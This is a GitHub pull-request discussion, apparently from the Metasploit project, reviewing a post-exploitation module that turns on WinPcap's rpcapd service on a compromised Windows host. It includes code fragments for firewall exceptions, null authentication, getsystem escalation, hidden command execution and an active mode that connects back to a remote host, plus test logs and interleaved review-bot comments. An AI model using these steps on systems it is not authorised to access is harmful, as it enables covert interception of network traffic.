
Post windows module to start rpcapd service (active/passive mode) #761

Merged
merged 3 commits into from Nov 28, 2012

BorjaMerino (Contributor) commented Sep 5, 2012

The module enables the Remote Packet Capture System (rpcapd service) included in the default installation of Winpcap. The module allows you to set up the service in passive or active mode (useful if the client is behind a firewall).

@jlee-r7 jlee-r7 commented on an outdated diff Sep 6, 2012

modules/post/windows/manage/rpcapd_start.rb
+ This module enables the Remote Packet Capture System (rpcapd service)
+ included in the default installation of Winpcap. The module allows you to set up
+ the service in passive or active mode (useful if the client is behind a firewall).
+ If authentication is enabled you need a local user account to capture traffic.
+ PORT will be used depending of the mode configured.},
+ 'License' => BSD_LICENSE,
+ 'Author' => [ 'Borja Merino <bmerinofe[at]gmail.com>'],
+ 'Platform' => [ 'windows' ],
+ 'SessionTypes' => [ 'meterpreter' ]
+ ))
+
+ register_options(
+ [
+ OptBool.new('NULLAUTH', [ true, 'Enable Null Authentication.', true]),
+ OptBool.new('ACTIVE', [ true, 'Enable rpcapd in active mode (passive by default).', false]),
+ OptBool.new('GETSYSTEM', [ true, 'Try to get System privilege.', true]),
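Review bot: the last sentence of the Description, "PORT will be used depending of the mode configured", does not tell the user what PORT means in each mode; since the option help reads "Local/Remote port", spell it out here: in passive mode PORT is the local port rpcapd listens on, in active mode it is the port on RHOST that rpcapd connects back to (and it is "depending on", not "depending of"). Separately, GETSYSTEM defaulting to true means the module attempts privilege escalation unless the user opts out; a default of false, or a plain privilege check that tells the user what is missing, is the less surprising behaviour for a manage module.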
jlee-r7 (Contributor) Sep 6, 2012

Modules should not run getsystem. Check for necessary privileges and tell the user if they need to run it.

@jlee-r7 jlee-r7 commented on an outdated diff Sep 6, 2012

modules/post/windows/manage/rpcapd_start.rb
+ 'SessionTypes' => [ 'meterpreter' ]
+ ))
+
+ register_options(
+ [
+ OptBool.new('NULLAUTH', [ true, 'Enable Null Authentication.', true]),
+ OptBool.new('ACTIVE', [ true, 'Enable rpcapd in active mode (passive by default).', false]),
+ OptBool.new('GETSYSTEM', [ true, 'Try to get System privilege.', true]),
+ OptAddress.new('RHOST', [ false, 'Remote host to connect (set in active mode only).']),
+ OptInt.new('PORT', [ true, 'Local/Remote port to capture traffic.',2002])
+ ], self.class)
+ end
+
+ def run
+ #Check platform to avoid problems with getsystem (e.g. java/java)
+ if check_perm and client.platform =~ /win32|win64/i
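Review bot: RHOST is registered as not required (`OptAddress.new('RHOST', [ false, ...])`) yet the active mode cannot work without it; rather than discovering that mid-run, validate at the top of `run`: if `datastore['ACTIVE']` is true and `datastore['RHOST']` is nil, `print_error` and `return` before any service or registry change is made. Also the comment `#Check platform to avoid problems with getsystem (e.g. java/java)` explains the `client.platform =~ /win32|win64/i` guard purely as a getsystem workaround, so the guard should go when the getsystem call does, and the comment needs a space after `#` to match the rest of the file.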
jlee-r7 (Contributor) Sep 6, 2012

Artificial restriction. This is a fairly simple task that should work just fine on java or a shell session.

@jlee-r7 jlee-r7 commented on an outdated diff Sep 6, 2012

modules/post/windows/manage/rpcapd_start.rb
+ print_good("Got System")
+ return true
+ else
+ print_error("Couldn't get System")
+ return false
+ end
+ elsif !is_admin? and datastore['GETSYSTEM']==false
+ return false
+ else # is_admin? = true
+ return true
+ end
+ end
+
+ def run_rpcapd(p)
+ begin
+ client.sys.process.execute("cmd.exe /c sc config rpcapd binpath= \"#{p}\" ",nil, {'Hidden' => 'true', 'Channelized' => true})
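Review bot: the `elsif !is_admin? and datastore['GETSYSTEM']==false` branch returns false with no output, so a non-admin user who disabled GETSYSTEM never learns why the module stopped; add a `print_error` there saying admin rights are required. In `client.sys.process.execute(...)` the options hash mixes `'Hidden' => 'true'` (a String) with `'Channelized' => true` (a boolean); use `true` for both for consistency. Finally, `p` is interpolated straight into the `sc config rpcapd binpath=` command line, so the datastore values it is built from (RHOST, PORT) should be validated before this point is reached.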
jlee-r7 (Contributor) Sep 6, 2012

You should avoid process.execute when cmd_exec will do (i.e., unless you need to use a token). Using process.execute means this can't run on a shell session.

@jlee-r7 jlee-r7 commented on an outdated diff Sep 6, 2012

modules/post/windows/manage/rpcapd_start.rb
+ print_status("Rpcapd is already running. Restarting service ...")
+ if service_stop("rpcapd") and service_start("rpcapd")
+ print_good("Service restarted successfully: #{p}")
+ else
+ print_error("There was an error restarting rpcapd.exe. Try to run it again")
+ end
+ end
+ rescue::Exception => e
+ print_status("The following Error was encountered: #{e.class} #{e}")
+ end
+ end
+
+ def fw_enable(prog)
+ print_status ("Enabling rpcapd.exe in Windows Firewall")
+ begin
+ if (client.fs.file.exists?(prog))
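Review bot: `rescue::Exception => e` catches every exception, including interrupts and errors the framework wants to propagate; rescue `::StandardError` (or the specific Rex error you expect) instead, and report it with `print_error` rather than `print_status` so the failure is marked as one. Also `print_status ("Enabling rpcapd.exe in Windows Firewall")` has a space before the parenthesis, which Ruby warns about, and `client.fs.file.exists?(prog)` should be the session-independent `file?` helper from `Msf::Post::File`, as noted in review.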
jlee-r7 (Contributor) Sep 6, 2012

use the methods from Post::File which are platform and session type independent.

@jlee-r7 jlee-r7 commented on an outdated diff Sep 6, 2012

modules/post/windows/manage/rpcapd_start.rb
+ OptInt.new('PORT', [ true, 'Local/Remote port to capture traffic.',2002])
+ ], self.class)
+ end
+
+ def run
+ #Check platform to avoid problems with getsystem (e.g. java/java)
+ if check_perm and client.platform =~ /win32|win64/i
+ serv = service_info("rpcapd")
+ print_status("Checking if machine #{sysinfo['Computer']} has rpcapd service")
+
+ if serv['Name'] !~ /remote/i
+ print_error("This machine doesn't seem to have the rpcapd service")
+ else
+ print_status("Rpcap service found: #{serv['Name']}")
+ reg=registry_getvaldata("HKLM\\SYSTEM\\CurrentControlSet\\Services\\rpcapd","Start")
+ prog=client.fs.file.expand_path("%ProgramFiles%") << "\\winpcap\\rpcapd.exe"
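Review bot: `serv = service_info("rpcapd")` is dereferenced as `serv['Name']` before anything checks that the service exists; if the lookup returns nil on a host without WinPcap, the `!~` test raises NoMethodError instead of reaching the `print_error("This machine doesn't seem to have the rpcapd service")` branch. Guard with `if serv.nil? or serv['Name'] !~ /remote/i`. Also the `print_status("Checking if machine ...")` line runs after the lookup it announces; move it above `service_info`.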
jlee-r7 (Contributor) Sep 6, 2012

use expand_path from the Post::File mixin instead.

BorjaMerino (Contributor) commented Sep 7, 2012

Hi @jlee-r7, thanks for all the explanations.

jvazquez-r7 (Contributor) commented Nov 27, 2012

Tested successfully:

msf  exploit(handler) > use post/windows/manage/rpcapd_start 
msf  post(rpcapd_start) > show options
Module options (post/windows/manage/rpcapd_start):
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   ACTIVE    false            yes       Enable rpcapd in active mode (passive by default).
   NULLAUTH  true             yes       Enable Null Authentication.
   PORT      2002             yes       Local/Remote port to capture traffic.
   RHOST                      no        Remote host to connect (set in active mode only).
   SESSION                    yes       The session to run this module on.
msf  post(rpcapd_start) > show sessions
Active sessions
===============
  Id  Type                   Information                                      Connection
  --  ----                   -----------                                      ----------
  1   meterpreter x86/win32  JUAN-C0DE875735\Administrator @ JUAN-C0DE875735  192.168.1.129:4444 -> 192.168.1.147:1743 (192.168.1.147)
msf  post(rpcapd_start) > set SESSION 1
SESSION => 1
msf  post(rpcapd_start) > run
[*] Checking if machine JUAN-C0DE875735 has rpcapd service
[*] Rpcap service found: Remote Packet Capture Protocol v.0 (experimental)
[*] Setting rpcapd as 'auto' service
[*] Enabling rpcapd.exe in Windows Firewall
[*] Installing rpcap in PASSIVE mode (local port: 2002) 
[+] Rpcapd started successfully: C:\Program Files\winpcap\rpcapd.exe -d -p 2002 -n
[*] Post module execution completed

After that I'm able to connect to the remote interface on the port 2002 and capture traffic from a remote host.

BorjaMerino (Contributor) commented Nov 27, 2012

@jvazquez-r7 Thank you so much for checking it out.

@jvazquez-r7 jvazquez-r7 commented on an outdated diff Nov 27, 2012

modules/post/windows/manage/rpcapd_start.rb
+ serv = service_info("rpcapd")
+ print_status("Checking if machine #{sysinfo['Computer']} has rpcapd service")
+
+ if serv['Name'] !~ /remote/i
+ print_error("This machine doesn't seem to have the rpcapd service")
+ else
+ print_status("Rpcap service found: #{serv['Name']}")
+ reg=registry_getvaldata("HKLM\\SYSTEM\\CurrentControlSet\\Services\\rpcapd","Start")
+ prog=expand_path("%ProgramFiles%") << "\\winpcap\\rpcapd.exe"
+ if reg != 2
+ print_status("Setting rpcapd as 'auto' service")
+ service_change_startup("rpcapd","auto")
+ end
+ if datastore['ACTIVE']==true
+ print_error("RHOST is not set ") if datastore['RHOST']==nil
+ p = prog << " -d -a #{datastore['RHOST']},#{datastore['PORT']} -v "
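Review bot: `print_error("RHOST is not set ") if datastore['RHOST']==nil` only prints; execution falls through to `p = prog << " -d -a #{datastore['RHOST']},#{datastore['PORT']} -v "` and builds a command line with an empty host. Add `return` after the `print_error`. Also `prog << ...` appends in place, so after this line `prog` no longer holds the bare executable path; if `prog` is reused elsewhere (for example passed to `fw_enable`), build `p` by concatenation instead: `p = "#{prog} -d -a #{datastore['RHOST']},#{datastore['PORT']} -v"`. Finally, `registry_getvaldata(...)` is compared with `reg != 2`; a missing value is nil and will also trigger the 'auto' change, which is probably intended but deserves a comment.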
jvazquez-r7 (Contributor) Nov 27, 2012

As @jlee-r7 has pointed out, it could happen that RHOST is nil. It doesn't seem to make sense when running in active mode, does it?

If RHOST is always needed to run in active mode, in case of RHOST being nil, just print_error to warn the user and return.

Thanks @jlee-r7 for keeping on pointing things out!

@jvazquez-r7 jvazquez-r7 commented on an outdated diff Nov 27, 2012

modules/post/windows/manage/rpcapd_start.rb
+ include Msf::Post::Windows::Registry
+ include Msf::Post::Windows::WindowsServices
+ include Msf::Post::Windows::Priv
+ include Msf::Post::Common
+ include Msf::Post::File
+
+ def initialize(info={})
+ super( update_info( info,
+ 'Name' => 'Enable Remote Packet Capture Service',
+ 'Description' => %q{
+ This module enables the Remote Packet Capture System (rpcapd service)
+ included in the default installation of Winpcap. The module allows you to set up
+ the service in passive or active mode (useful if the client is behind a firewall).
+ If authentication is enabled you need a local user account to capture traffic.
+ PORT will be used depending of the mode configured.},
+ 'License' => BSD_LICENSE,
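Review bot: `'License' => BSD_LICENSE` departs from the MSF_LICENSE used by the framework's other modules; unless a different license is intended, switch it to MSF_LICENSE. Also the closing `}` of the `%q{...}` Description sits on the last text line (`...mode configured.},`); putting it on its own line keeps the block readable and matches the surrounding metadata layout.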
jvazquez-r7 (Contributor) Nov 27, 2012

Can MSF_LICENSE be used? Or would you like to use BSD_LICENSE?

BorjaMerino (Contributor) commented Nov 27, 2012

@jvazquez-r7 yes, of course MSF_LICENSE; I was wrong to write it, and I've just seen that I also put BSD_LICENSE in the safe delete (sdel). Could you please change it?

Thank you.

jvazquez-r7 (Contributor) commented Nov 28, 2012

@bmerinofe sure I can change the license type for you when merging, no problem! :)

Is there any response for the comment about the RHOST being nil in the active mode? (see above :) )

jvazquez-r7 (Contributor) commented Nov 28, 2012

Awesome, looks good and works as expected, merging!

msf  post(rpcapd_start) > show options
Module options (post/windows/manage/rpcapd_start):
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   ACTIVE    false            yes       Enable rpcapd in active mode (passive by default).
   NULLAUTH  true             yes       Enable Null Authentication.
   PORT      2002             yes       Local/Remote port to capture traffic.
   RHOST                      no        Remote host to connect (set in active mode only).
   SESSION                    yes       The session to run this module on.
msf  post(rpcapd_start) > set session 1
session => 1
msf  post(rpcapd_start) > rexploit
[*] Reloading module...
[*] Checking if machine JUAN-C0DE875735 has rpcapd service
[*] Rpcap service found: Remote Packet Capture Protocol v.0 (experimental)
[*] Enabling rpcapd.exe in Windows Firewall
[*] Installing rpcap in PASSIVE mode (local port: 2002) 
[+] Rpcapd started successfully: C:\Program Files\winpcap\rpcapd.exe -d -p 2002 -n
[*] Post module execution completed
msf  post(rpcapd_start) > set ACTIVE true
ACTIVE => true
msf  post(rpcapd_start) > rexploit
[*] Reloading module...
[*] Checking if machine JUAN-C0DE875735 has rpcapd service
[*] Rpcap service found: Remote Packet Capture Protocol v.0 (experimental)
[-] RHOST is not set 
[*] Post module execution completed

@jvazquez-r7 jvazquez-r7 merged commit cdd9eb1 into rapid7:master Nov 28, 2012

1 check passed

default The Travis build passed